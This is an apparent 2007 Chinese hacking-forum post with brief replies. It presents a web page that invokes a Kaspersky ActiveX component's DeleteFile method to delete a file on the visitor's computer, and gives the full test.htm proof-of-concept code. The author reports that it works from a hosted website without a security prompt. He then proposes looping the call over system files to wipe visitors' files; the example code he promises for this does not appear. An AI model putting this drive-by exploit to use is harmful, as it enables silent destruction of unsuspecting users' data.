为了证明我的猜想,制作一个网页来调用这个接口函数。之所以选择网页,是因为如果我们是编写可执行程序调用这个函数,那就没什么意思了,编过程序的朋友都知道,任何一种编程语言本身就有删除文件的函数,大可不必使用卡巴斯基的接口函数。我们的目的是测试安装了卡巴斯基的用户,会不会在不知情的情况下,莫名地被删除文件。这里大家可以用我提供的网页文件test.htm做一下测试,其代码如下。
程序代码
CODE:
<SCRIPT language=javascript>
function test()
{
bug.DeleteFile("E:\\1.txt");
//这里就是调用函数DeleteFile,为了测试,我传递给它一个E盘下的1.txt文件的完整路径名
}
</script>
<object classid="clsid:D9EC22E7-1A86-4F7C-8940-0303AE5D6756" name="bug">
//这是卡巴斯基组件的注册标识
</object>
<script>javascript:test(); //调用测试函数
</script>这个测试网页是为了测试通过卡巴斯基的组件接口函数能不能删除我E盘下的名为1.txt的文件,测试的接口函数就是DeleteFile。点击访问这个网页文件,注意,如果你的系统是Windows XP SP2,这里会有一个安全提示,但是如果上传到网站再访问的话,就不会有安全提示了。打开这个网页后,发现我E盘上的1.txt文件果真被删除了。等一下,这里只是本地测试了一下,如果把这个网页文件放到网站上,在我们访问时会不会也删除我们电脑上的文件呢?为了测试,我把这个文件放到了网站上,抱着激动的心情,我马上访问这个网页,E盘下的1.txt文件果真被删除了!
有了这个测试结果,如果我们把代码重写一下,使用一个遍历过程,比如使用For循环,遍历的内容为系统文件或者一些指定的文件,就像下面的示例代码一样。当有人访问这个恶意网页后,他电脑上的所有文件就会在弹指间烟飞灰灭了。
最新回复
yas0715 (2007-6-17 17:02:25)
PS:有个小疑问,不大晓得楼主是不是经常在黒防发表文章的
那个kevin1986,嘿嘿,id神似啊!
呢喃公子 (2007-6-22 20:32:19)
々流氓→仔仔 (2007-6-23 13:51:59)
乐与怒 (2007-6-23 14:40:00)
不会吧............
iqiohonglang (2007-6-23 18:17:55)
hnxtzsl (2007-7-16 08:26:47)
jszxjx (2007-7-16 21:30:02)
々流氓→仔仔 (2007-7-22 15:03:29)
jiaolong635 (2007-7-22 16:40:10)
千山鸟飞绝 (2007-7-22 17:35:45)
super_ljx (2007-7-22 19:53:59)
不是一般的黑 (2007-7-23 19:04:00)
xiange88 (2008-4-09 21:10:29)
没事干 (2008-4-10 17:07:22)
soul723 (2008-5-11 13:53:57)
udb311 (2008-5-12 09:01:57)
那如果像LZ所说,下载卡巴的朋友就不得不注意了。尽可能到安全网站去down,不然做了个这个后门。数据就全完蛋了~~~~
BellFlower (2008-5-12 09:40:20)
试 试
kongzheng87 (2008-5-12 11:08:50)
楼主
卡巴有新的利用价值了
wutom (2008-6-11 19:43:27)
.
头号病毒 (2008-6-11 21:11:43)
可惜,学个c半途而废,现在有想vb...实在不懂自己。。。